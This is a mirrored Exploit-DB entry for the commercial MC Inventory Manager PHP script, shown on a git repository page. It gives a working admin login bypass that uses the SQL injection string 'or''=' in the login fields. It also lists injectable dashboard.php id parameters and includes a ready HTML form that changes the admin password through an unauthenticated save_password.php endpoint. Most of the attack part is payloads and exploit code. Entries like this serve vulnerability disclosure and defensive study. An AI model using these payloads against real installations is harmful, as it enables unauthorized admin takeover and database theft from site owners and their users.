bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41068.txt
Offensive Security b086c09178 DB: 2017-01-16 
11 new exploits

9 Network Linkedin Clone Script - Improper Access Restrictions
Article Directory Script Seo 3.2 - Improper Access Restrictions
e-Soft24 Jokes Portal Script Seo 1.3 - Authentication Bypass
MC Smart Shop Script - SQL Injection
MC Buy and Sell Cars Script 1.1 - SQL Injection
MC Yellow Pages Script - SQL Injection
MC Real Estate Pro Script - Improper Access Restrictions
MC Hosting Coupons Script - Cross-Site Request Forgery
MC Inventory Manager Script - Multiple Vulnerabilities
MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions
MC Documentation Creator Script - SQL Injection
2017-01-16 05:01:17 +00:00

37 lines
No EOL
1.2 KiB
Text
Executable file
Raw Blame History

# # # # #
# Vulnerability: Admin Login Bypass & SQLi
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Inventory Manager
# Script Buy Now: http://microcode.ws/product/mc-inventory-manager-php-script/3885
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Admin Login Bypass
# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # #
# http://localhost/[PATH]/dashboard.php?p=view_sell&id=[SQL]
# http://localhost/[PATH]//dashboard.php?p=edit_item&id=[SQL]
# E.t.c....
# Other features have the same security vulnerability.
# Exploit:
<html>
<body>
<form action="http://localhost/[PATH]/functions/save_password.php" method="post" parsley-validate>
<fieldset>
<label>Change Password : </label>
<input type="password" placeholder="Type new password" name="password" required/>
</fieldset>
<fieldset>
<label>Re-type Password : </label>
<input type="password" placeholder="Re-Type password again" name="repassword" required/>
</fieldset>
<button type="submit" class="btn btn-sm btn-success">Save
<i class="icon-arrow-right icon-on-right bigger-110"></i>
</button>
</form>
</body>
</html>
# # # # #
# # # # #
Reference in a new issue View git blame Copy permalink